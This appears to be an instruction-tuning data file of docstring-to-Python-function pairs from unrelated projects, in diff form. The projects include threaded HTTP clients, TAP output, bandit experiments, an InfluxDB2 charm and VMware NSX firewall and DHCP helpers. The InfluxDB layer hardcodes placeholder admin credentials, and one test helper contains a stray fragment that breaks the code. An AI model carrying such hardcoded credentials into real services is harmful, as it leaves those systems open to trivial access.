+ lg.debug("Plugin %s doesn't have filter parameter %s" % (plugin['name'], filter['key']))
+ match = False
+ break
+ elif isinstance(filter, list):
+ if plugin['name'] in filter:
+ lg.debug("Plugin %s matched requested plugins list" % plugin['name'])
+ match = True
+ continue
+ else:
+ match = False
+ lg.debug("Plugin %s doesn't match requested plugins list" % plugin['name'])
+ break
+ match = match_result(match)
+ return match
+[INST] Open given uri in parallel and
+get JSON-parsed result. [/INST] def open(self, uri=None, resource=None, data=None):
+ if not uri and not resource:
+ raise Exception("Argument uri or resource have to be submitted")
+ pool = []
+ for host in self.hosts:
+ t = threading.Thread(name=host.name, target=host.open, args=(uri, resource, data,))
+ t.daemon = True
+ t.start()
+ pool.append(t)
+ self.wait(pool)
+ result = {}
+ for host in self.hosts:
+ result[host.name] = host.get_result()
+ return result
+[INST] Wait until all threads in pool are done. [/INST] def wait(self, pool):
+ done = False
+ while not done:
+ done = True
+ for t in pool:
+ if t.is_alive():
+ done = False
+ time.sleep(0.5)
+[INST] Wait until all threads in pool are done
+and show nice progress bar. [/INST] def wait_progress(self, pool):
+ try:
+ with ProgressBar(len(pool)) as progress:
+ progress.wait_pool(pool)
+ except NonInteractiveError as e:
+ lg.warn(e)
+ self.wait(pool)
+[INST] Open given uri and get JSON-parsed result. [/INST] def open(self, uri=None, resource=None, data=None, timeout=20):
+ if not uri and not resource:
+ raise Exception("Argument uri or resource have to be submitted")
+ if resource:
+ try:
+ uri = self.links[resource]['href']
+ except KeyError:
+ lg.error("Can't find resource %s" % resource)
+ return False
+ if data:
+ data = data.encode('utf-8')
+ url = '%s%s' % (self.url, uri)
+ lg.info("Host %s: requesting url %s" % (self.name, url))
+ try:
+ fh = urllib.request.urlopen(url, timeout=timeout, data=data)
+ except Exception as e:
+ lg.error("Host %s: can't open resource %s: %s" % (self.name, url, e))
+ return False
+ fh = fh.read()
+ if not _PY3:
+ fh = fh.decode('utf-8')
+ try:
+ json = simplejson.loads(fh)
+ except Exception as e:
+ lg.error("Host %s: can't load response as JSON: %s" % (self.name, e))
+ return False
+ self._result = json
+ return json
+[INST] Force plugin run
+Poll process until result. [/INST] def force_run(self, plugins):
+ plugins_list = list(plugins.keys())
+ data = simplejson.dumps({
+ 'process' : {
+ 'plugins' : plugins_list,
+ }
+ })
+ lg.info("Forcing run of %d plugins on host %s" % (len(plugins_list), self.name))
+ process = self.open(resource='processes', data=data)
+ if process:
+ poll = process['asyncTask']['link']['poll']
+ return self.poll(uri=poll)
+ else:
+ return False
+[INST] Print number of hosts in result. [/INST] def count_hosts(self):
+ return len(self)
+[INST] Dump all tests into tap structure. [/INST] def dump(self):
+ dump = []
+ dump.append('1..%s' % len(self.tests))
+ for test in self.tests:
+ dump.append(test.dump())
+ return '\n'.join(dump)
+[INST] Add TapTest instance as subtest
+Return subtest index. [/INST] def add_subtest(self, test):
+ test.index = self.subtests_index
+ self.subtests.append(test)
+ self.subtests_index += 1
+ return test.index
+[INST] Dump TapTest result into TAP
+Should be used from Tap instance to dump all results
+
+Dump messages in YAMLish format. [/INST] def dump(self):
+ dump = []
+ dump.append('%s %s - %s' % (self.status, self.index, self.name))
+ if self.messages:
+ messages = []
+ for key, values in self.messages.items():
+ if values:
+ messages.append('\t- %s:' % key)
+ for msg in values:
+ messages.append("\t\t- %s" % msg)
+ if messages:
+ messages.insert(0, '---')
+ messages.append('...')
+ dump.append('\n'.join(messages))
+ if self.subtests:
+ dump_subtests = []
+ dump_subtests.append('\t1..%s' % len(self.subtests))
+ for test in self.subtests:
+ dump_subtests.append(test.dump())
+ dump.append(re.sub('\n', '\n\t', '\n'.join(dump_subtests)))
+ return '\n'.join(dump)
+[INST] Match value with defined template field.. [/INST] def m_eq(value, templ_value):
+ retMatch = None
+ retBoundName = None
+ m_t = m_regex.match(templ_value)
+ if m_t:
+ gd = m_t.groupdict()
+ if gd.get('bound'):
+ retBoundName = gd['bound']
+ retMatch = True
+ if gd.get('re_bound'):
+ retMatch = re.match(gd['re_bound'], value)
+ if gd.get('re'):
+ retMatch = re.match(gd['re'], value)
+ if gd.get('re_bound_neg'):
+ retMatch = not re.match(gd['re_bound_neg'], value)
+ if gd.get('re_neg'):
+ retMatch = not re.match(gd['re_neg'], value)
+ if gd.get('type'):
+ retMatch = isinstance(value, m_get_type(gd['type']))
+ if gd.get('literal'):
+ retMatch = value == gd['literal']
+ if gd.get('normal'):
+ retMatch = value == gd['normal']
+ return retMatch, retBoundName
+[INST] Will return proper instance of namedtuple (all named Row).. [/INST] def row_tuple(fields_str, additional_fields=None):
+ def mk__getattr__(additional_fields):
+ def _attr_f(t, self, name):
+ if t and name in t:
+ return string.Template(t[name]).safe_substitute(**self._asdict())
+ return None
+ return lambda self, name: _attr_f(additional_fields, self, name)
+ if fields_str not in _tuple_cache:
+ Row = collections.namedtuple('Row', fields_str)
+ Row.__getattr__ = mk__getattr__(additional_fields=additional_fields)
+ Row.__str = Row.__str__
+ Row.__str__ = lambda t: (
+ '|<| ' +
+ ' | '.join('%s: %s' % (f, getattr(t, f)) for f in t._fields)
+ + ' |>|')
+ _tuple_cache[fields_str] = Row
+ return _tuple_cache[fields_str]
+[INST] Extend attribute of `Row` namedtuple.
+Return `None` on invalid field.
+Return formatted string when name is in TEMPLATE dictionary.. [/INST] def mk__getattr__(additional_fields):
+ def _attr_f(t, self, name):
+ if t and name in t:
+ return string.Template(t[name]).safe_substitute(**self._asdict())
+ return None
+ return lambda self, name: _attr_f(additional_fields, self, name)
+[INST] Object is iterable but not string.. [/INST] def is_iterable(s):
+ if isinstance(s, (str, bytes)):
+ return False
+ return hasattr(s, '__iter__')
+[INST] Make sure dictionary and/or list iterate with same protocol.. [/INST] def iter_tuplepairs(structure):
+ if isinstance(structure, (str, bytes)):
+ return tuple()
+ elif isinstance(structure, collections.Mapping):
+ return iteritems(structure)
+ elif isinstance(structure, collections.Sequence) or is_iterable(structure):
+ return enumerate(structure)
+ else:
+ return tuple()
+[INST] Integral type is only type that this function can verify.
+But it's okay, don't really need more types.. [/INST] def m_get_type(val):
+ tp = ''.join(val.split('!'))
+ if tp == 'Integral':
+ import numbers
+ return numbers.Integral
+ return None
+[INST] Step down the template dict to the proper sub-branch.. [/INST] def delve_in_template(templ, name, value):
+ if name is not None:
+ return templ['$' + name]
+ elif value in templ:
+ return templ[value]
+ types = list(filter(lambda x: x.startswith('!'),
+ iter(templ.keys())))
+ for t in types:
+ if isinstance(value, m_get_type(t)):
+ return templ[t]
+ raise IndexError("(VALUE: %s) or (PATTERN: %s) not in '%s'" % (value, name, templ))
+[INST] Decision predicate if current captured fields satisfy matching rules and can delve further.. [/INST] def m_field_dicts(data_fields, templ):
+ def fields_only(d):
+ flds = {}
+ for field_candidate, value in d.items():
+ if is_scalar(value):
+ flds[field_candidate] = value
+ return flds
+ def satisfy_fields(d, t):
+ retVal = tuple()
+ template_fields = fields_only(t)
+ plain_fields = list(itertools.filterfalse(lambda s: s.startswith('$'),
+ iter(template_fields.keys())))
+ if set(d.keys()).issuperset(set(plain_fields)):
+ for f in plain_fields:
+ match, bound_name = m_eq(d[f], t[f])
+ if not match:
+ return None, tuple()
+ if bound_name:
+ retVal = retVal + ((bound_name, d[f]),)
+ return True, retVal
+ return None, tuple()
+ return satisfy_fields(data_fields, templ)
+[INST] Reinitialize bandit for a new run when running in serial or parallel. [/INST] def initialization(self, testbed):
+ testbed.reset_ev()
+ self.n = 1
+ self.Q = deepcopy(self.Q_init)
+ self.Na = {a: 0 for a in self.Q}
+ self.At = self.argmax(self.Q)
+[INST] Return max estimate Q, if tie between actions, choose at random between tied actions. [/INST] def argmax(self, Q):
+ Q_array = np.array(list(self.Q.values()))
+ At = np.argwhere(Q_array == np.max(Q_array)).flatten().tolist()
+ if len(At) > 1:
+ At = np.random.choice(At)
+ else:
+ At = At[0]
+ return list(Q.keys())[At]
+[INST] Run bandit for specified number of steps and optionally multiple runs. [/INST] def run(self, testbed, steps, n_runs=1, n_jobs=4, serial=False):
+ if serial:
+ self.action_values = self._serialrun(testbed, steps, n_runs)
+ elif n_runs >= 4:
+ if n_jobs > cpu_count():
+ warnings.warn(
+ f"Warning: running n_jobs: {n_jobs}, with only {cpu_count()} cpu's detected",
+ RuntimeWarning,
+ )
+ self.action_values = self._multirun(testbed, steps, n_runs, n_jobs=n_jobs)
+ else:
+ self.action_values = self._serialrun(testbed, steps, n_runs)
+[INST] Reshape action_values numpy array and output as pandas dataframe. [/INST] def output_df(self):
+ n_rows = self.action_values.shape[2] * self.action_values.shape[0]
+ df = pd.DataFrame(
+ data=self.action_values.transpose(2, 0, 1).reshape(-1, len(self.columns)),
+ columns=self.columns,
+ )
+ return df
+[INST] Reshape action_values numpy array and output as pandas dataframe
+Add epsilon coefficient used for greedy bandit. [/INST] def output_df(self):
+ df = super().output_df()
+ df["epsilon"] = self.epsilon
+ return df
+[INST] Reinitialize bandit attributes for a new run. [/INST] def initialization(self, testbed):
+ testbed.reset_ev()
+ self.n = 1
+ self.Q = deepcopy(self.Q_init)
+ self.Na = {a: 1e-100 for a in self.Na}
+[INST] Reshape action_values numpy array and output as pandas dataframe
+Add c coefficient used for UCL. [/INST] def output_df(self):
+ df = super().output_df()
+ df["c"] = self.c
+ return df
+[INST] Reinitialize bandit attributes for a new run. [/INST] def initialization(self, testbed):
+ testbed.reset_ev()
+ self.n = 1
+ self.H = deepcopy(self.Q_init)
+ self.Q = deepcopy(self.Q_init)
+ self.Na = {a: 0 for a in self.Q}
+[INST] Reshape action_values numpy array and output as pandas dataframe
+Add learning rate. [/INST] def output_df(self):
+ df = super().output_df()
+ df["lr"] = self.lr
+ return df
+[INST] Average all dataframe columns across runs. [/INST] def average_runs(df, group=[]):
+ return df.groupby(["step"] + group).mean().reset_index()
+[INST] Write scalars to local using aim
+Return
+Value of last step. [/INST] def write_scalars(df, session, column: str, tag: str, hp: dict):
+ df = average_runs(df)
+ df.apply(
+ lambda x: session.track(
+ x[column],
+ epoch=int(x.step),
+ name=tag,
+ ),
+ axis=1,
+ )
+ return df[column].iloc[-1]
+[INST] Provide an estimate of the testbed values across all arms
+n (int): Number of iterations to execute in testbed. [/INST] def estimate_distribution(self, n=1000) -> pd.DataFrame:
+ self.p_drift = 0.0
+ R = pd.DataFrame(columns=["reward", "action", "strategy"])
+ for a in self.expected_values:
+ Ra = pd.DataFrame(self.action_value(a, shape=(n, 1)), columns=["reward"])
+ Ra["action"] = a
+ Ra["strategy"] = "uniform"
+ R = pd.concat([R, Ra])
+ if self.initial_ev != self.expected_values:
+ self.expected_values = deepcopy(self.initial_ev)
+ for a in self.initial_ev:
+ Ra = pd.DataFrame(self.action_value(a, shape=(n, 1)), columns=["reward"])
+ Ra["action"] = a
+ Ra["strategy"] = "uniform"
+ R = pd.concat([R, Ra])
+ return R
+[INST] Return true best action that should have been taken based on EV state. [/INST] def best_action(self):
+ A_best = list(self.expected_values.keys())[
+ np.argmax([ev["mean"] for ev in self.expected_values.values()])
+ ]
+ return A_best
+[INST] Handle the pebble_ready event for the influxdb2 container.. [/INST] def _on_config_changed(self, event: HookEvent) -> None:
+ container = self.unit.get_container(WORKLOAD_CONTAINER)
+ try:
+ plan = container.get_plan().to_dict()
+ except (APIError, ConnectionError) as error:
+ logger.debug(f"The Pebble API is not ready yet. Error message: {error}")
+ event.defer()
+ return
+ logger.debug(f"[*] container plan => {plan}")
+ pebble_config = Layer(raw=self._influxdb2_layer())
+ if plan.get("services", {}) == pebble_config.to_dict()["services"]:
+ logger.debug("Pebble plan has already been loaded. No need to update the config.")
+ return
+ try:
+ container.add_layer("influxdb2", pebble_config, combine=True)
+ except (APIError, ConnectionError) as error:
+ logger.debug(f"The Pebble API is not ready yet. Error message: {error}")
+ event.defer()
+ return
+ if self._is_running(container, WORKLOAD_CONTAINER):
+ container.stop(WORKLOAD_CONTAINER)
+ container.start(WORKLOAD_CONTAINER)
+ self.unit.status = ActiveStatus("Pod is ready")
+[INST] Provide Grafana with data source information.. [/INST] def _on_grafana_source_relation_changed(self, event: RelationEvent) -> None:
+ if not self.model.unit.is_leader():
+ return
+ relation_data = {
+ "private-address": subprocess.check_output(["unit-get", "private-address"])
+ .decode()
+ .strip(),
+ "port": "8086",
+ "source-type": "influxdb",
+ }
+ event.relation.data[self.unit].update(relation_data)
+[INST] Returns initial Pebble configuration layer for Influxdb2.. [/INST] def _influxdb2_layer(self) -> dict:
+ return {
+ "summary": "influxdb2 layer",
+ "description": "pebble config layer for influxdb2",
+ "services": {
+ "influxdb2": {
+ "override": "replace",
+ "summary": "influxdb2 service",
+ "command": "/entrypoint.sh influxd",
+ "startup": "enabled",
+ "environment": {
+ "DOCKER_INFLUXDB_INIT_MODE": "setup",
+ "DOCKER_INFLUXDB_INIT_USERNAME": "admin",
+ "DOCKER_INFLUXDB_INIT_PASSWORD": "thisisatest123",
+ "DOCKER_INFLUXDB_INIT_ORG": "influxdata",
+ "DOCKER_INFLUXDB_INIT_BUCKET": "default",
+ "DOCKER_INFLUXDB_INIT_RETENTION": "0s",
+ "DOCKER_INFLUXDB_INIT_ADMIN_TOKEN": "asdfasdfasdf",
+ "INFLUXD_BOLT_PATH": "/var/lib/influxdbv2/influxd.bolt",
+ "INFLUXD_ENGINE_PATH": "/var/lib/influxdbv2",
+ "INFLUXD_HTTP_BIND_ADDRESS": ":8086",
+ },
+ }
+ },
+ }
+[INST] Helper method to determine if a given service is running in a given container. [/INST] def _is_running(self, container: Container, service: str) -> bool:
+ try:
+ svc = container.get_service(service)
+ return svc.current == ServiceStatus.ACTIVE
+ except ModelError:
+ return False
+[INST] Delete firewall rule, as resource_id used response
+from add_firewall_rule. [/INST] def delete_firewall_rule(client_session, resource_id):
+ try:
+ esg_id, rule_id = resource_id.split("|")
+ except Exception as ex:
+ raise cfy_exc.NonRecoverableError(
+ 'Unexpected error retrieving resource ID: %s' % str(ex)
+ )
+ result = client_session.delete(
+ 'firewallRule', uri_parameters={
+ 'edgeId': esg_id, 'ruleId': rule_id
+ })
+ common.check_raw_result(result)
+[INST] common function with any call from clint_session. [/INST] def _common_uninstall_external_and_unintialized(
+ self, resource_id, func_call, func_kwargs, additional_params=None
+ ):
+ kwargs = self._kwargs_regen(func_kwargs)
+ self.fake_ctx.instance.runtime_properties['resource_id'] = None
+ if additional_params:
+ for i in additional_params:
+ self.fake_ctx.instance.runtime_properties[i] = i
+ func_call(**kwargs)
+ self.assertEqual(self.fake_ctx.instance.runtime_properties, {})
+ kwargs = self._kwargs_regen(func_kwargs)
+ self.fake_ctx.instance.runtime_properties['resource_id'] = resource_id
+ self.fake_ctx.node.properties['use_external_resource'] = True
+ if additional_params:
+ for i in additional_params:
+ self.fake_ctx.instance.runtime_properties[i] = i
+ func_call(**kwargs)
+ self.assertEqual(self.fake_ctx.instance.runtime_properties, {})
+ if resource_id.find('|') >= 0:
+ new_resource_id = resource_id + "|_"
+ fake_client, fake_cs_result, kwargs = self._kwargs_regen_client(
+ new_resource_id, func_kwargs
+ )
+ with mock.patch(
+ 'cloudify_nsx.library.nsx_common.NsxClient',
+ fake_client
+ ):
+ with self.assertRaises(cfy_exc.NonRecoverableError) as error:
+ func_call(**kwargs)
+ self.assertTrue(str(error.exception).find(
+ 'Unexpected error retrieving resource ID'
+ ) == 0)
+ fake_client, fake_cs_result, kwargs = self._kwargs_regen_client(
+ resource_id, func_kwargs
+ )
+ if additional_params:
+ for i in additional_params:
+ self.fake_ctx.instance.runtime_properties[i] = i
+ with mock.patch(
+ 'cloudify_nsx.library.nsx_common.NsxClient',
+ fake_client
+ ):
+ with self.assertRaises(cfy_exc.NonRecoverableError):
+ func_call(**kwargs)
+ fake_client.assert_called_with(
+ 'raml', 'host', 'username', 'password'
+ )
+ runtime = self.fake_ctx.instance.runtime_properties
+ self.assertEqual(runtime['resource_id'], resource_id)
+ self.assertEqual(
+ runtime['nsx_auth'], {
+ 'username': 'username',
+ 'password': 'password',
+ 'host': 'host',
+ 'raml': 'raml'
+ }
+ )
+ if additional_params:
+ for i in additional_params:
+ self.assertEqual(runtime.get(i), i)
+[INST] check that we have RecoverableError with empty properties. [/INST] def _common_run_relationship(self, func):
+ fake_client, fake_cs_result, kwargs = self._kwargs_regen_client(
+ None, {}, False
+ )
+ with mock.patch(
+ 'cloudify_nsx.library.nsx_common.NsxClient',
+ fake_client
+ ):
+ with self.assertRaises(cfy_exc.NonRecoverableError):
+ func(**kwargs)
+[INST] Check skip install logic if we have use_existing and don't have
+additional checks inside. [/INST] def _common_use_existing_without_run(self, resource_id, func_call,
+ func_kwargs):
+ kwargs = self._kwargs_regen(func_kwargs)
+ kwargs['use_external_resource'] = True
+ kwargs['resource_id'] = resource_id
+ func_call(**kwargs)
+ self.assertTrue(
+ self.fake_ctx.instance.runtime_properties['use_external_resource']
+ )
+[INST] Check skip install logic if we have resource_id
+or have issues with session. [/INST] def _common_install(self, resource_id, func_call, func_kwargs,
+ relationships=None):
+ kwargs = self._kwargs_regen(func_kwargs)
+ self.fake_ctx.instance.runtime_properties['resource_id'] = resource_id
+ if relationships:
+ self.fake_ctx.instance.relationships = relationships
+ func_call(**kwargs)
+ fake_client, fake_cs_result, kwargs = self._kwargs_regen_client(
+ None, func_kwargs
+ )
+ with mock.patch(
+ 'cloudify_nsx.library.nsx_common.NsxClient',
+ fake_client
+ ):
+ if relationships:
+ self.fake_ctx.instance.relationships = relationships
+ with self.assertRaises(cfy_exc.NonRecoverableError):
+ func_call(**kwargs)
+ fake_client.assert_called_with(
+ 'raml', 'host', 'username', 'password'
+ )
+ runtime = self.fake_ctx.instance.runtime_properties
+ self.assertFalse('resource_id' in runtime)
+ self.assertEqual(
+ runtime['nsx_auth'], {
+ 'username': 'username',
+ 'password': 'password',
+ 'host': 'host',
+ 'raml': 'raml'
+ }
+ )
+[INST] check install logic that read/extract current state and than send
+update request. [/INST] def _common_install_extract_or_read_and_update(
+ self, resource_id, func_call, func_kwargs,
+ extract_args=None, extract_kwargs=None, extract_response=None,
+ read_args=None, read_kwargs=None, read_response=None,
+ create_args=None, create_kwargs=None, create_response=None,
+ update_args=None, update_kwargs=None, update_response=None,
+ relationships=None
+ ):
+ self._common_install(resource_id, func_call, func_kwargs,
+ relationships=relationships)
+ fake_client, fake_cs_result, kwargs = self._kwargs_regen_client(
+ None, func_kwargs
+ )
+ with mock.patch(
+ 'cloudify_nsx.library.nsx_common.NsxClient',
+ fake_client
+ ):
+ self._update_fake_cs_result(
+ fake_cs_result,
+ extract_response=extract_response,
+ read_response=read_response,
+ create_response=create_response,
+ update_response=update_response
+ )
+ if relationships:
+ self.fake_ctx.instance.relationships = relationships
+ func_call(**kwargs)
+ self._check_fake_cs_result(
+ fake_cs_result,
+ extract_response=extract_response,
+ extract_args=extract_args, extract_kwargs=extract_kwargs,
+ read_response=read_response,
+ read_args=read_args, read_kwargs=read_kwargs,
+ create_response=create_response,
+ create_args=create_args, create_kwargs=create_kwargs,
+ update_response=update_response,
+ update_args=update_args, update_kwargs=update_kwargs
+ )
+ runtime = self.fake_ctx.instance.runtime_properties
+ self.assertEqual(
+ runtime['resource_id'],
+ resource_id
+ )
+[INST] check install logic run create only. [/INST] def _common_install_create(
+ self, resource_id, func_call, func_kwargs,
+ create_args, create_kwargs, create_response
+ ):
+ self._common_install(resource_id, func_call, func_kwargs)
+ fake_client, fake_cs_result, kwargs = self._kwargs_regen_client(
+ None, func_kwargs
+ )
+ with mock.patch(
+ 'cloudify_nsx.library.nsx_common.NsxClient',
+ fake_client
+ ):
+ self._update_fake_cs_result(
+ fake_cs_result,
+ create_response=create_response
+ )
+ func_call(**kwargs)
+ self._check_fake_cs_result(
+ fake_cs_result,
+ create_response=create_response,
+ create_args=create_args, create_kwargs=create_kwargs
+ )
+ runtime = self.fake_ctx.instance.runtime_properties
+ self.assertEqual(
+ runtime['resource_id'],
+ resource_id
+ )
+[INST] check install logic that check 'existing' by read
+and than run create. [/INST] def _common_install_read_and_create(
+ self, resource_id, func_call, func_kwargs, read_args, read_kwargs,
+ read_response, create_args, create_kwargs, create_response,
+ recheck_runtime=None
+ ):
+ self._common_install(resource_id, func_call, func_kwargs)
+ if read_response:
+ fake_client, fake_cs_result, kwargs = self._kwargs_regen_client(
+ None, func_kwargs
+ )
+ self.fake_ctx.node.properties['use_external_resource'] = True
+ with mock.patch(
+ 'cloudify_nsx.library.nsx_common.NsxClient',
+ fake_client
+ ):
+ self._update_fake_cs_result(
+ fake_cs_result,
+ read_response=read_response
+ )
+ func_call(**kwargs)
+ self._check_fake_cs_result(
+ fake_cs_result,
+ read_response=read_response,
+ read_args=read_args, read_kwargs=read_kwargs,
+ )
+ runtime = self.fake_ctx.instance.runtime_properties
+ self.assertEqual(
+ runtime['resource_id'], resource_id
+ )
+ if recheck_runtime:
+ for field in recheck_runtime:
+ self.assertEqual(
+ runtime[field],
+ recheck_runtime[field]
+ )
+ , but empty response
+ fake_client, fake_cs_result, kwargs = self._kwargs_regen_client(
+ None, func_kwargs
+ )
+ self.fake_ctx.node.properties['use_external_resource'] = True
+ with mock.patch(
+ 'cloudify_nsx.library.nsx_common.NsxClient',
+ fake_client
+ ):
+ self._update_fake_cs_result(
+ fake_cs_result,
+ read_response=SUCCESS_RESPONSE
+ )
+ with self.assertRaises(cfy_exc.NonRecoverableError):
+ func_call(**kwargs)
+ self._check_fake_cs_result(
+ fake_cs_result,
+ read_response=read_response,
+ read_args=read_args, read_kwargs=read_kwargs,
+ )
+ self.assertFalse(
+ 'resource_id' in self.fake_ctx.instance.runtime_properties
+ )
+ fake_client, fake_cs_result, kwargs = self._kwargs_regen_client(
+ None, func_kwargs
+ )
+ with mock.patch(
+ 'cloudify_nsx.library.nsx_common.NsxClient',
+ fake_client
+ ):
+ self._update_fake_cs_result(
+ fake_cs_result,
+ read_response=read_response
+ )
+ with self.assertRaises(cfy_exc.NonRecoverableError):
+ func_call(**kwargs)
+ self._check_fake_cs_result(
+ fake_cs_result,
+ read_response=read_response,
+ read_args=read_args, read_kwargs=read_kwargs,
+ )
+ self.assertFalse(
+ 'resource_id' in self.fake_ctx.instance.runtime_properties
+ )
+ fake_client, fake_cs_result, kwargs = self._kwargs_regen_client(
+ None, func_kwargs
+ )
+ with mock.patch(
+ 'cloudify_nsx.library.nsx_common.NsxClient',
+ fake_client
+ ):
+ self._update_fake_cs_result(
+ fake_cs_result,
+ read_response=SUCCESS_RESPONSE,
+ create_response=create_response
+ )
+ func_call(**kwargs)
+ self._check_fake_cs_result(
+ fake_cs_result,
+ read_response=read_response,
+ read_args=read_args, read_kwargs=read_kwargs,
+ create_response=create_response,
+ create_args=create_args, create_kwargs=create_kwargs
+ )
+ runtime = self.fake_ctx.instance.runtime_properties
+ self.assertEqual(
+ runtime['resource_id'],
+ resource_id
+ )
+[INST] for functions when we only run delete directly. [/INST] def _common_uninstall_delete(
+ self, resource_id, func_call, func_kwargs, delete_args, delete_kwargs,
+ additional_params=None, read_args=None, read_kwargs=None,
+ read_response=None
+ ):
+ self._common_uninstall_external_and_unintialized(
+ resource_id, func_call, func_kwargs,
+ additional_params=additional_params
+ )
+ fake_client, fake_cs_result, kwargs = self._kwargs_regen_client(
+ resource_id, func_kwargs
+ )
+ with mock.patch(
+ 'cloudify_nsx.library.nsx_common.NsxClient',
+ fake_client
+ ):
+ self._update_fake_cs_result(
+ fake_cs_result,
+ read_response=read_response,
+ delete_response=SUCCESS_RESPONSE
+ )
+ func_call(**kwargs)
+ self._check_fake_cs_result(
+ fake_cs_result,
+ read_response=read_response,
+ read_args=read_args, read_kwargs=read_kwargs,
+ delete_response=SUCCESS_RESPONSE,
+ delete_args=delete_args, delete_kwargs=delete_kwargs
+ )
+ self.assertEqual(self.fake_ctx.instance.runtime_properties, {})
+[INST] delete when read/update enought. [/INST] def _common_uninstall_read_update(
+ self, resource_id, func_call, func_kwargs, read_args, read_kwargs,
+ read_response, update_args, update_kwargs, additional_params=None
+ ):
+ self._common_uninstall_external_and_unintialized(
+ resource_id, func_call, func_kwargs,
+ additional_params=additional_params
+ )
+ fake_client, fake_cs_result, kwargs = self._kwargs_regen_client(
+ resource_id, func_kwargs
+ )
+ with mock.patch(
+ 'cloudify_nsx.library.nsx_common.NsxClient',
+ fake_client
+ ):
+ self._update_fake_cs_result(
+ fake_cs_result,
+ read_response=read_response,
+ update_response=SUCCESS_RESPONSE
+ )
+ func_call(**kwargs)
+ self._check_fake_cs_result(
+ fake_cs_result,
+ read_response=read_response,
+ read_args=read_args, read_kwargs=read_kwargs,
+ update_response=SUCCESS_RESPONSE,
+ update_args=update_args, update_kwargs=update_kwargs
+ )
+ self.assertEqual(self.fake_ctx.instance.runtime_properties, {})
+[INST] This function adds an interface gw to one dlr. [/INST] def dlr_add_interface(client_session, dlr_id, interface_ls_id, interface_ip,
+ interface_subnet, name=None, vnic=None):
+ dlr_interface_dict = client_session.extract_resource_body_example(
+ 'interfaces', 'create'
+ )
+ interface = dlr_interface_dict['interfaces']['interface']
+ interface['addressGroups']['addressGroup']['primaryAddress'] = interface_ip
+ interface['addressGroups']['addressGroup']['subnetMask'] = interface_subnet
+ interface['isConnected'] = "true"
+ interface['connectedToId'] = interface_ls_id
+ interface['name'] = name
+ interface['index'] = vnic
+ result_raw = client_session.create(
+ 'interfaces', uri_parameters={'edgeId': dlr_id},
+ query_parameters_dict={'action': "patch"},
+ request_body_dict=dlr_interface_dict
+ )
+ common.check_raw_result(result_raw)
+ ifindex = result_raw['body']['interfaces']['interface']['index']
+ resource_id = "%s|%s" % (ifindex, dlr_id)
+ return ifindex, resource_id
+[INST] This function sets the default firewall rule to accept or deny. [/INST] def esg_fw_default_set(client_session, esg_id, def_action,
+ logging_enabled=None):
+ if not logging_enabled:
+ logging_enabled = 'false'
+ def_policy_body = client_session.extract_resource_body_example(
+ 'defaultFirewallPolicy', 'update'
+ )
+ firewall_default_policy = def_policy_body['firewallDefaultPolicy']
+ firewall_default_policy['action'] = def_action
+ firewall_default_policy['loggingEnabled'] = logging_enabled
+ cfg_result = client_session.update('defaultFirewallPolicy',
+ uri_parameters={'edgeId': esg_id},
+ request_body_dict=def_policy_body)
+ common.check_raw_result(cfg_result)
+[INST] This function deletes an interface gw to one dlr. [/INST] def dlr_del_interface(client_session, resource_id):
+ try:
+ ifindex, dlr_id = resource_id.split("|")
+ except Exception as ex:
+ raise cfy_exc.NonRecoverableError(
+ 'Unexpected error retrieving resource ID: %s' % str(ex)
+ )
+ result_raw = client_session.delete(
+ 'interfaces', uri_parameters={'edgeId': dlr_id},
+ query_parameters_dict={
+ 'index': ifindex
+ })
+ common.check_raw_result(result_raw)
+[INST] This function deletes a default gw to one dlr. [/INST] def dlr_del_dgw(client_session, resource_id):
+ result_raw = client_session.delete('routingConfig',
+ uri_parameters={'edgeId': resource_id})
+ common.check_raw_result(result_raw)
+[INST] This function enables/disables the DHCP server on an Edge Gateway
+and sets the logging status and Level. [/INST] def dhcp_server(client_session, esg_id, enabled=None, syslog_enabled=None,
+ syslog_level=None):
+ change_needed = False
+ raw_result = client_session.read(
+ 'dhcp', uri_parameters={'edgeId': esg_id})
+ common.check_raw_result(raw_result)
+ current_dhcp_config = raw_result['body']
+ new_dhcp_config = current_dhcp_config
+ if enabled:
+ if current_dhcp_config['dhcp']['enabled'] == 'false':
+ new_dhcp_config['dhcp']['enabled'] = 'true'
+ change_needed = True
+ else:
+ if current_dhcp_config['dhcp']['enabled'] == 'true':
+ new_dhcp_config['dhcp']['enabled'] = 'false'
+ change_needed = True
+ if syslog_enabled == 'true':
+ if current_dhcp_config['dhcp']['logging']['enable'] == 'false':
+ new_dhcp_config['dhcp']['logging']['enable'] = 'true'
+ change_needed = True
+ elif syslog_enabled == 'false':
+ if current_dhcp_config['dhcp']['logging']['enable'] == 'true':
+ new_dhcp_config['dhcp']['logging']['enable'] = 'false'
+ change_needed = True
+ if syslog_level:
+ if current_dhcp_config['dhcp']['logging']['logLevel'] != syslog_level:
+ new_dhcp_config['dhcp']['logging']['logLevel'] = syslog_level
+ change_needed = True
+ if change_needed:
+ result = client_session.update('dhcp',
+ uri_parameters={'edgeId': esg_id},
+ request_body_dict=new_dhcp_config)
+ common.check_raw_result(result)
+[INST] This function configures vnic interfaces on ESGs. [/INST] def esg_cfg_interface(client_session, esg_id, ifindex, ipaddr=None,
+ netmask=None, prefixlen=None, name=None, mtu=None,
+ is_connected=None, portgroup_id=None, vnic_type=None,
+ enable_send_redirects=None, enable_proxy_arp=None,
+ secondary_ips=None):
+ vnic_config = client_session.read(
+ 'vnic', uri_parameters={'index': ifindex, 'edgeId': esg_id}
+ )['body']
+ if not mtu:
+ mtu = 1500
+ if not vnic_type:
+ vnic_type = 'internal'
+ vnic_config['vnic']['mtu'] = mtu
+ vnic_config['vnic']['type'] = vnic_type
+ if name:
+ vnic_config['vnic']['name'] = name
+ if portgroup_id:
+ vnic_config['vnic']['portgroupId'] = portgroup_id
+ if enable_send_redirects:
+ vnic_config['vnic']['enableSendRedirects'] = enable_send_redirects
+ if enable_proxy_arp:
+ vnic_config['vnic']['enableProxyArp'] = enable_proxy_arp
+ if is_connected:
+ vnic_config['vnic']['isConnected'] = is_connected
+ if ipaddr and (netmask or prefixlen):
+ address_group = {}
+ sec_ips = []
+ if netmask:
+ address_group['subnetMask'] = netmask
+ if prefixlen:
+ address_group['subnetPrefixLength'] = str(prefixlen)
+ if secondary_ips:
+ sec_ips = secondary_ips
+ address_group['primaryAddress'] = ipaddr
+ address_group['secondaryAddresses'] = {'ipAddress': sec_ips}
+ vnic_config['vnic']['addressGroups'] = {'addressGroup': address_group}
+ cfg_result = client_session.update(
+ 'vnic', uri_parameters={'index': ifindex, 'edgeId': esg_id},
+ request_body_dict=vnic_config)
+ common.check_raw_result(cfg_result)
